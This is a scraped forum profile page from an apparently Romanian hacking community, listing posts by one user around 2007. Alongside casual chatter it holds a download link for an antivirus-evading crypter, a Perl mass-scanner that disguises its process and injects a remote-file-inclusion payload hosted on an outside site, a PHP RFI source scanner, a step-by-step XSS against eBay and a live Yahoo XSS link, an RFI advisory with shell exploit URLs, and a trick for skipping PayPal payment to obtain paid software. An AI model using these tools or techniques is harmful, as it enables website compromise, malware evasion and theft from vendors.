Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Ras

  1. exladexu4.jpg

    Disk Password Protection - boot protection, partition protection

    Disk Password Protection is complex protection for your computer, disks, partitions and confidential information against unauthorized access. Protect your disks and partitions with a password, hide and protect your information from other people, restrict viewing and launching files. Protect starting operating systems on your computer with a password.

    It is low-level protection. It works directly with the disk and does not depend on any operating systems, programs or other equipment. Passwords are encrypted and stored in the protected areas of the disk. Owing to this, the protection will work on any computers and can be controlled from any computer.
    Disk Password Protection offers you to select the type of protection that better meets your requirements.

    Having an original, simple interface and a step-by-step wizard, the program allows users of any level work with protection.



    Main features:

    • Boot protection
    The computer will boot from a protected disk only after the valid password is entered.
    • Partition protection
    A protected partition is invisible on the disk and unavailable for read/write operations.
    • Low-level protection
    A protected hard disk is blocked against any read/write operations on the hardware level.
    • Password-protected launch
    This feature will allow you to restrict other users' access to the program on your computer.
    • Command-line support will allow you to automate and hide the process of enabling and disabling disk/partition protection.
    • The program allows you to enter a password hint. The hint will help you recall your forgotten password. There are no other ways to recover it or to disable protection without the password.
    • SDK for software developers. SDK allows you to use the functionality of Disk Password Protection in applications where there is a need to protect information on media.

    Homepage: www.exlade.com

    Download: http://rapidshare.com/files/60842658/EXLADE_Disk_Password_Protection_v4.8.930.rar

  2. scfh1.jpg

    AhnLab-V3    2007.10.6.0    2007.10.05    -
    AntiVir 7.6.0.20 2007.10.05 -
    Authentium 4.93.8 2007.10.05 -
    Avast 4.7.1051.0 2007.10.06 -
    AVG 7.5.0.488 2007.10.06 -
    BitDefender 7.2 2007.10.06 Trojan.Downloader.Agent.YFZ
    CAT-QuickHeal 9.00 2007.10.06 -
    ClamAV 0.91.2 2007.10.06 -
    DrWeb 4.44.0.09170 2007.10.06 Trojan.DownLoader.origin
    eSafe 7.0.15.0 2007.10.04 -
    eTrust-Vet 31.2.5190 2007.10.06 -
    Ewido 4.0 2007.10.06 -
    FileAdvisor 1 2007.10.06 -
    Fortinet 3.11.0.0 2007.10.06 -
    F-Prot 4.3.2.48 2007.10.05 -
    F-Secure 6.70.13030.0 2007.10.06 -
    Ikarus T3.1.1.12 2007.10.06 -
    Kaspersky 7.0.0.125 2007.10.06 -
    McAfee 5135 2007.10.05 -
    Microsoft 1.2908 2007.10.06 -
    NOD32v2 2575 2007.10.06 -
    Norman 5.80.02 2007.10.05 -
    Panda 9.0.0.4 2007.10.06 -
    Prevx1 V2 2007.10.06 -
    Rising 19.43.50.00 2007.10.06 -
    Sophos 4.22.0 2007.10.06 -
    Sunbelt 2.2.907.0 2007.10.06 -
    Symantec 10 2007.10.06 -
    TheHacker 6.2.6.078 2007.10.06 -
    VBA32 3.12.2.4 2007.10.05 -
    VirusBuster 4.3.26:9 2007.10.06 -
    Webwasher-Gateway 6.0.1 2007.10.05 -

    Download: http://rapidshare.com/files/60839827/Simple_Crypter_v2.rar

  3. #!/usr/bin/perl

    use LWP::Simple;
    use IO::Socket::INET;



    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n";

    if(!@ARGV[0]){
    print "\t[ use: perl php5.0.pl <procura> ]\n\n";
    exit;
    }
    print "\t[ Camuflando pid ]\n";
    my $processo = "/usr/local/sbin/httpd - spy";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);

    print "\t[ Pid: $pid Processo: $processo ]\n";

    $caxe = ".";
    $caxe1 = ".";
    $caxe .= rand(9999);
    $caxe1 .= rand(9999);
    $arq = ".";
    $arq = int rand(9999);

    open(sites,">$arq");
    print sites "";
    close(sites);


    $procura = @ARGV[0];
    chomp $procura;
    print "\t[ Procurando por $procura no Google ]\n";
    for($n=0;$n<900;$n += 10){
    $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
    print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
    print $sock "Host: www.google.com.br";
    print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print $sock "Accept-Language: pt-br, pt;q=0.50";
    print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print $sock "Keep-Alive: 300";
    print $sock "Connection: keep-alive";

    @resu = <$sock>;
    close($sock);
    $ae = "@resu";
    while ($ae=~ m/<a href=.*?>.*?<\/a>/){
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {
    if ($uber !~ /cache/)
    {
    if ($uber !~ /"/)
    {
    if ($uber !~ /google/)
    {
    if ($uber !~ /216/)
    {
    if ($uber =~/http/)
    {
    if ($uber !~ /start=/)
    {
    open(arq,">>$arq");
    print arq "$uber\n";
    close(arq);
    }}}}}}}}}
    print "\t[ Procurando por $procura no Cade ]\n";

    for($cadenu=1;$cadenu <= 991; $cadenu +=10){

    @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
    $ae = "@cade";

    while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
    $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/[b]//g;
    $uber =~ s/<\/b>//g;

    open(a,">>$arq");
    print a "$uber\n";
    close(a);
    }}
    print "\t[ Pronto sites pegos no google e cade ]\n";
    print "\t[ Excluindo os sites repetidos ]\n";
    $ark = $arq;
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);


    $a =0;
    $b =0;
    open(ae,"<$arq");
    while(<ae>)
    {$sites[$a] = $_;
    chomp $sites[$a];
    $a++;
    $b++;}
    close(ae);
    print "\t[ Total de sites para scanear: $a ]\n";
    for ($a=0;$a<=$b;$a++){
    open (file, ">$caxe");
    print file "";
    close(file);
    open (file, ">$caxe1");
    print file "";
    close(file);
    $k=0;
    $e=0;
    $data=get($sites[$a]) or next;
    while($data=~ m/<a href=".*?">.*?<\/a>/){
    $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
    $ubersite=$1;

    if ($ubersite =~/"/)
    {
    $nu = index $ubersite, '"';
    $ubersite = substr($ubersite,0,$nu);
    }
    if ($ubersite !~/http/)
    {$ubersite = $sites[$a].'/'.$ubersite;}
    open(file,">>$caxe") || die("nao abriu caxe.txt $!");
    print file "$ubersite\n";
    close(file);
    }

    $lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
    $t =0;
    $y =0;
    @ja;
    open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
    while (<opa>)
    {
    $ja[$t] = $_;
    chomp $ja[$t];
    $t++;
    $y++;
    }
    close(opa);
    $t=1;
    while ($t < $y)
    {
    if ($ja[$t] =~/=/)
    {
    $num = rindex $ja[$t], '=';
    $num += 1;
    $ja[$t] = substr($ja[$t],0,$num);
    open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
    print jaera "$ja[$t]$lista1\n";
    close(jaera);
    $num = index $ja[$t], '=';
    $num += 1;
    $ja[$t] = substr($ja[$t],0,$num);
    $num1 = rindex $ja[$t], '.';
    $subproc = substr($ja[$t],$num1,$num);

    open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
    print jaera "$ja[$t]$lista1\n";
    close(jaera);
    }
    $t++;
    }
    $ark = "$caxe1";
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);
    $q=0;
    $w=0;
    @hot;
    open (ops,"<$caxe1");
    while(<ops>)
    {
    $hot[$q] = $_;
    chomp $hot[$q];
    $q++;
    $w++;
    }
    close(ops);
    print "\t[ Começando o scan aguarde. Pode demorar horas. ]\n";
    for($q=0;$q<=$w;$q++)
    {

    if ($hot[$q] =~/http/)
    {
    $tipo=get($hot[$q]) or next;
    if($tipo =~/root/)
    {
    if ($tipo =~/etc/)
    {
    if ($tipo =~/boot/)
    {
    open(a,">>res.txt");
    print a "$hot[$q]\n";
    close(a);
    }}}}}}

    print "\t[ Pronto scanner concluido ]\n";
    print "\t[ O resultado foi salvo no ftp do spykids ]\n"

  4. <?php 

    /***************************************************************************

    * PHP Evil RFI Scanner v1.2 *

    * *

    * Copyright © 2007 by evilsocket *

    * *

    * http://www.evilsocket.net *

    * *

    * This program is free software; you can redistribute it and/or modify *

    * it under the terms of the GNU General Public License as published by *

    * the Free Software Foundation; either version 2 of the License, or *

    * (at your option) any later version. *

    * *

    * This program is distributed in the hope that it will be useful, *

    * but WITHOUT ANY WARRANTY; without even the implied warranty of *

    * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *

    * GNU General Public License for more details. *

    * *

    * You should have received a copy of the GNU General Public License *

    * along with this program; if not, write to the *

    * Free Software Foundation, Inc., *

    * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *

    * *

    ***************************************************************************/

    /* regex per individuare le inclusioni */

    $escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' )

    ;

    /* regex per estrarre il nome delle variabili */

    $escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' )

    ;

    /* array di estensioni dei file da scansionare */

    $escan_valid_ext = array( 'php' );

    /* massima grandezza di un file da scansionare, se 0 scansiona tutti */

    $escan_max_size = 0;

    /* contatore delle directory scansionate */

    $escan_dir_count = 0;

    /* contatore dei file scansionati */

    $escan_file_count = 0;

    /* contatore dei potenziali rfi trovati */

    $escan_match_count = 0;

    /* contatore dei bytes totali scansionati */

    $escan_byte_count = 0;

    escan_banner();

    if( $argc < 2 ){

    escan_usage($argv[0]);

    }

    else{

    $stime = escan_get_mtime();

    escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );

    $etime = escan_get_mtime();

    print "\n@ Scan report : \n\n" .

    "\t$escan_dir_count directory .\n".

    "\t$escan_file_count file .\n".

    "\t" . escan_format_size($escan_byte_count) . " .\n".

    "\t$escan_match_count potenziali RFI .\n".

    "\t".($etime-$stime) . " secondi di elaborazione .\n\n";

    }

    /* formatta in una stringa una grandezza espressa in bytes */

    function escan_format_size($bytes)

    {

    if( $bytes < 1024 ) return "$bytes bytes";

    if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb";

    if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";

    return ($bytes / 1073741824) . " Gb";

    }

    /* restituisce il timestamp espresso in secondi */

    function escan_get_mtime()

    {

    list($usec, $sec) = explode(" ",microtime());

    return ((float)$usec + (float)$sec);

    }

    /* estrae la linea di codice dell inclusione */

    function escan_scan_line($content,$offset)

    {

    list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($c

    ontent)) );

    return $line.";";

    }

    /* estrae il nome della variabile dalla riga di codice dell inclusione */

    function escan_parse_var( $line, $regex_id )

    {

    global $escan_var_regex;

    $vars = preg_split($escan_var_regex[$regex_id],$line);

    $varname = $vars[1];

    $delimiters = " .);";

    for( $i = 0; $i < strlen($varname); $i++ ){

    for( $j = 0; $j < strlen($delimiters); $j++ ){

    if($varname[$i] == $delimiters[$j]){

    return substr( $varname, 0, $i );

    }

    }

    }

    return $varname;

    }

    /* controlla se la variabile $var viene definita in $content prima della posizio

    ne $offset */

    function escan_check_definitions($content,$offset,$var)

    {

    if( strpos( $var, "->" ) ){

    return 1;

    }

    $chunk = substr($content,0,$offset);

    $regex = "/".preg_quote($var,"/")."\s*=/ix";

    preg_match( $regex, $chunk,$matches );

    return count($matches);

    }

    /* parserizza il file $file per controllare la presenza di potenziali rfi */

    function escan_parse_file($file)

    {

    global $escan_inc_regex;

    global $escan_max_size;

    global $escan_file_count;

    global $escan_match_count;

    global $escan_byte_count;

    $fsize = filesize($file);

    if( $escan_max_size && $fsize > $escan_max_size ) return;

    $escan_file_count++;

    $escan_byte_count += $fsize;

    $content = @file_get_contents($file);

    for( $i = 0; $i < count($escan_inc_regex); $i++ ){

    if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PR

    EG_OFFSET_CAPTURE ) ){

    $nmatch = count($matches[0]);

    for( $j = 0; $j < $nmatch; $j++ ){

    $offset = $matches[0][$j][1];

    $line = escan_scan_line($content,$offset);

    $var = escan_parse_var($line,$i);

    if( escan_check_definitions($content,$offset,$var) == 0 )

    {

    $escan_match_count++;

    print "@ $file - \n\t- '$var' alla posizione $offset .\n"{ ;

    }

    }

    }

    }

    }

    }

    /* restituisce l'estensione del file $fname */

    function escan_get_file_ext($fname)

    {

    if( strchr($fname,'.') ){

    return substr($fname,strrpos($fname,'.')+1);

    }

    else{

    return "";

    }

    }

    /* controlla se il file $fname

  5. R3 all..ma numesc fibrytzo,am 17 ani sunt interesat de hacking,cracking,web design si sunt nou pentru ca pana acum am frecventat alte forumuri asemanatoare dar mai slabe calitativ.Imi pare bine sa fiu membru pe RST. :D

    welcome!

    ne cunoastem de pe alt forum. :P

  6. http://www.numedecod.ro/

    Intrati pe site-ul de mai sus si downloadati Status Length Patch.

    Fisierul pe care il downloadati trebuie sa il puneti in C:\Program Files\Yahoo! Messenger\Messenger.

    Dupa ce puneti fisierul acolo iesiti de pe messenger, rulati fisierul si o sa va apara ca messengerul este patched...

    Apoi va relogati si puteti sa va puneti status IMENS!

  7. ...Ras di ce teo mancat degetele sa urci Xss-ul ala de Yahoo??? gasit de Slick "pe vremuri"...

    ...asa fain mergea ala... cred ca de mai bine de 6 luni...acum trebuie sa il schimb la toate "manevrele" cu Xss-uri ce nu merg mai mult de 1 luna 2 doua...ca na...apar pe la toti rusii si turcii...indienii...etc...

    edit: sar putea sa mai tina un pic...dupa cate vad si asta de Japo ( http://www.yahoo.co.jp/s/p=tpc_md5/*-http://rd.yahoo.co.jp/toppage/topics/computer/net_research/?%68%74%74%70%3A%2F%2F%77%77%77%2E%72%73%74%7A%6F%6E%65%2E%6F%72%67)

    mai tine inca din 8 sept. si mai sunt cateva de ceva vreme...

    virusss eu nu aveam de unde sa stiu ca voi folositi acel XSS pe care din cate zici tu slick l-a gasit primu. Credeam ca eu l-am gasit primu.

    + ca acel XSS l-am pus acum ceva timp la Bug Reports si un admin l-a aprobat si dupa ceva timp alt admin l-a sters.

    Imi pare rau ca v-am dat treburile peste cap.

  8. Autor: Ras

    In acest "tutorial" am sa va arat cum am gasit eu XSS in ebay ieri :P

    Pentru inceput intrati pe http://ebay.com/

    Dupa ce se incarca pagina in partea din stanga avem "eBay Categories"

    Uitati-va putin mai jos si o sa observati ca scrie "Visit all categories" [dati click pe "Visit all categories"]

    Dupa ce ati dat click pe "Visit all categories" dati click pe "Jewelry & Watches"

    Dupa ce ati dat click pe "Jewelry & Watches" o sa vedeti ca va apare in dreapta sus o "casuta de cautare"

    In acea "casuta de cautare" scrieti Ras si dati "Search"

    Link-ul nostru o sa ajunga asa: http://search.ebay.com/search/search.dll?from=R40&_trksid=m37&satitle=Ras

    Adaugati "><script>alert(/XSS/)</script> dupa "search.dll?from=R40&" [si dati enter, o sa observati ca apare un "Alert Box" in care scrie /xss/]

    Link-ul nostru o sa ajunga asa: http://search.ebay.com/search/search.dll?from=R40&%22%3E%3Cscript%3Ealert(/XSS/'>http://search.ebay.com/search/search.dll?from=R40&%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E_trksid=m37&satitle=Ras

    http://search.ebay.com/search/search.dll?from=R40&"><script>alert(/XSS/)</script>_trksid=m37&satitle=Ras

    -Bafta!

    -Ras

    edit

    Am uitat sa va spun ca merge numai pe Firefox.

    Thx Nemessis.

  9. ca veni vorba de chesti dealea scary.. care fati jucat deaci OUIJA?? eu am un prieten.. numa cu asa ceva se ocupa.. ma chemat si pe mine.. dar nu am curaj sa joc.. Ouija = o metoda cu care sa vb cu spiritele.. printro tabla.. care este scris Alfabetu A-Z YES NO GOOD BYE 1-9

    uitativa la tot.. oricum.. ador reality shourile despre Ghost and paranormal..

    eu nu cred in asa ceva... cumva ei sunt controlati si li se misca mana catre Yes,No,1,A etc.

    daca spiritul le misca mana in timp ce joaca ouija de ce nu le misca mana si cand nu se joaca acest joc?

    mie unu mi se pare o chestie banala pe care si un copil de 8 ani poate sa o faca la misto...

  10. DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities

    Vulnerability Type: Remote File Inclusion
    Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php
    Exploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?[/url]
    Method: get
    Register_globals: On
    Vulnerable variable: set_depth
    Line number: 32
    Lines:

    ----------------------------------------------

    require ("".$set_depth."app.lib/product.control/core.php/functions.php");


    ----------------------------------------------

    Vulnerability Type: Remote File Inclusion
    Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php
    Exploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?[/url]
    Method: get
    Register_globals: On
    Vulnerable variable: set_depth
    Line number: 179
    Lines:

    ----------------------------------------------
    $category_html = 'form_select';
    require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
    ?>

    ----------------------------------------------

    Vulnerability Type: Remote File Inclusion
    Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php
    Exploit URL: [url]http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?[/url]
    Method: get
    Register_globals: On
    Vulnerable variable: set_depth
    Line number: 154
    Lines:

    ----------------------------------------------
    $category_html = 'form_select';
    require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
    ?>

    ----------------------------------------------
    Multiple Remote Vulnerabilities

    GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

    FoUnD By BiNgZa

    DoRk:

    [email]shadowcrew@hotmail.co.uk[/email]

    [url]http://shadow.wizhoo.com/[/url]

  11. Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

    Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

    1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor

    2) Search for the word "return"

    3) Next to it you can find the url for the thank you page

    4) Copy the url and paste it in your browser and you will see the download link

    This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

    You can try it here to start with:

    Code:

    http://www.ramphelp.com/halfpipe.html

    About half way down the page you will find:

    <input type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912hp654/26865thankyouhp08363215423.html ">

    Copy the link into your browser and download.

×
×
  • Create New...